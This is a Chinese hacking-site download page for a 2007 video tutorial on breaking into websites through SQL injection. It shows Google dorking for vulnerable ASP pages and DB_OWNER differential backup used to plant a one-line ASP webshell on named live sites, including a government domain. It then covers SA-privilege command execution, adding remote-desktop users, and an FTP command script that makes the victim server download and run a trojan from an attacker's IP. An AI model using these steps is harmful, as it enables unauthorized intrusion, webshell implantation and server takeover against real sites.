欢迎来到 黑吧安全网聚焦网络安全前沿资讯,精华内容,交流技术心得!

网站SA漏洞和DB_OWNER利用

  • 软件大小:17.8 MB
  • 软件语言:简体中文
  • 软件类型:入侵实例
  • 软件授权:免费教程
  • 更新时间:2007-03-25
  • 标签:
  • 开 发 商:http://www.myhack58.com
  • 应用平台:WinXP, Win7, Win8, WinAll
软件评分
网友评分:3

同类人气软件

立即下载

网站SA漏洞和DB_OWNER利用软件介绍

大家好。我是ヤ偽伱鈊賥ご(菜鸟哦。守望ID也是这名字)
今天给大家做个网站SA漏洞入侵服务器和DB_OWNER差异备份教程
第1次做教程。有点紧张。希望大家别见怪哦。。

准备工具
1.  啊DSQL注入2.3
2.  HDSI3.0
3.  Back Log To A Shell
4.  lake2eval一句话木马
找漏洞方法大家可以打开啊DSQL注入工具
在注入点里随便打开个搜索网站。这里我用google来示范。。
 点高级搜索。

第1行输入   关键字 inurl:asp
随便搜索。注入点应该很多。。这里我就不具体示范了。
很多哦。。自己去搞哟。
===============================================================================
DB_OWNER差异备份
由于时间关系。我就拿我刚刚找到的DB漏洞。
http://www.app.gov.cn/user/chinese/_zone/zone_main.asp?IClass=1916

用啊D来检测下。
当前权限DB_OWNER
用高级工具里来找他目录。
DB权限不能列目录应该是不能黑的。因为不能找到目录。要是你有其他方法找到他的目录那就可以了。
一般网站服务器会把目录放在D盘或者E盘。很少放在C盘的。
我们来找下。
我先用明小子来找他同服务器的其他站。这个也可以不用。可以直接找他这站的目录。我是为了方便
http://www.bjcita.com/BOOK_in.asp
e:\cita\

名字差不多吧。我们来试下。进去随便找个不经常用到的文件名来测试是不是这个网站,
BOOK_in.asp
请正确填写
大家看。这说明这地址有效。。如果服务器没有备份的话应该就这地址了。我们来试下。
主目录东西太多。寒。找个2级目录。
打开Back Log To A Shell
注入地址就用我们刚找到的。
http://www.app.gov.cn/user/chinese/_zone/zone_main.asp?IClass=1916
数据库就用啊D里找到的数据库。
数据库就这里找。
App_database
物理路径就用我们要备份木马的路径
e:\cita\inc\HACK.ASP
里面还没有HACK。AAP吧。备份完了就有了。

数字或者字符啊D里也有显示。
这个是字符。我们就点选字符吧。
让他备份。
好了备份完了。我们来刷新目录看下。
HACK。ASP。有了吧。用lake2eval来连接

大家看。已经备份成功。试下地。
用Back Log To A Shell备份的一句话密码是a
http://www.bjcita.com/inc\HACK.ASP
这是一句话地址。
可以连接上了嘿嘿。我们来传个马看看。
大马大家应该都有了吧。
Save to e:\cita\inc\xinsui.asp Success !
上传成功。连接看看哦。。
这样1个webshell就拿到乐。。
下面我们来说下SA权限拿服务器
===============================================================================
嘿嘿还是时间关系。。这是我刚找的SA漏洞地址。。。怕教程文件大。我自己先找了。
http://www.5166.com.cn/guoji_2.asp?n_type=251
大家看。啊D进行SQL注入里下面有个当前权限是SA。就是SA漏洞。
把这地址复制到HDSI3.0进行检测。有的SA漏洞在HDSI里检测不行。
大家看。权限是SA权限吧。。
点高级命令。 看能否执行命令。
命令正常回显。说明可以直接发CMD命令哦。
这里如果对方有开3389可以直接在对方主机加用户。这里是SA权限和其他权限的区别。可以直接拿服务器哦
这个服务器开了终端。我们先连接看看吧。
可以连接。我们来加用户先。
我刚刚已经加过了。登陆进去吧。
西西。服务器就是这么容易拿哦。不过我们国内的SA比较少。韩国的N多。
配置一般。刚刚我看过了。也开过传奇的捏。
SA漏洞大概就是这样的了。。SA权限有的内网没开3389的大家可以尝试直接给他主机种植我们的木马。

在对方CMD里执行
echo open IP>FTP.TXT
echo FTP帐号>>FTP.TXT
echo FTP密码>>FTp.TXT
echo get 木马文件名>>FTP.TXT
echo bye>>FTP.TXT
ftp -s:ftp.txt

这个几率很底。不过也有希望。
然后在直接运行木马文件就可以了。。或者也可以象DB一样来备份对方数据库
就上面的DB备份了。我以前搞过几台。弄不下只能拿他shell了。
===================================================================================

  • 热门下载